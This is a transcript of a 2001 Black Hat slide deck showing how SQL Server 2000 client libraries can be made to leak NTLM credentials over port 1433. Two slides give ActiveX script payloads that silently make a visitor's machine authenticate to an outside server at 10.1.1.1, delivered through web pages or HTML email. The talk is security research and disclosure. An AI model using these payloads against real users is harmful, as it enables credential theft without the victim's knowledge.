timothy mullen, anchoris.com blackhat vegas 2001 1 grabbin’ creds: forcing sql libs to deliver...
TRANSCRIPT
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 1
Grabbin’ Creds:Forcing SQL libs to
deliver LM/NT challenge and response on the back
channel…Timothy M. MullenAnchorIS.Com, [email protected]
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 2
The Culprit:SQL2000 Super Sockets
Lib• New functions in dbnetlib.dll!• Supports TCP/IP Sockets,
encryption, authentication, etc.• Default library on workstations that
have SQL2k client utilities installed. (MSDE as well?)
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 3
Backgrounders…
• SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)
• Integrated Authentication (NTLM Creds) needed Named Pipes
• Named Pipes required 139/445 open to authenticating system.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 4
Backgrounders… cont.
• Integrated Authentication has _always_ been the recommended configuration.
• 139/445 has long been blocked at the router (if not, you are a yum-yum.)
• Many server-to-server apps authenticate over TCP 1433 because it is “safe” .
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 5
The Skinny
• DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed)
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 6
The Problem
• Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass.
• Many have 1433 explicitly open for application support, server-to-server queries, etc.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 7
The Sting
• Client side ODBC connections can specify the target server, authentication type, and the library to use.
• Web sites can request client to perform ADODB recordset requests, as well as other tasks.
• HTML email as well.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 8
Somewhat Lame Example
• Web site with following tag:{conn=new ActiveXObject("ADODB.Connection");
conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();}
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 9
Example Cont…
• User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
• Easily engineered around…
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 10
Not So Lame Example
• Lets try this one:{ns = new
ActiveXObject("SQLNS.SQLNamespace");ns.Initialize ("Grabber", 2,
"Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
}
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 11
What’s the difference?
• SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ !
• Silently grab the creds for fun and profit!
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 12
Live Demo
• Don’t try this at home! Professional driver on closed course.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
13
Thanks! AnchorIS.Com www.anchoris.com HammerofGod www.hammerofgod.com
Timothy M. Mullen [email protected]@hammerofgod.com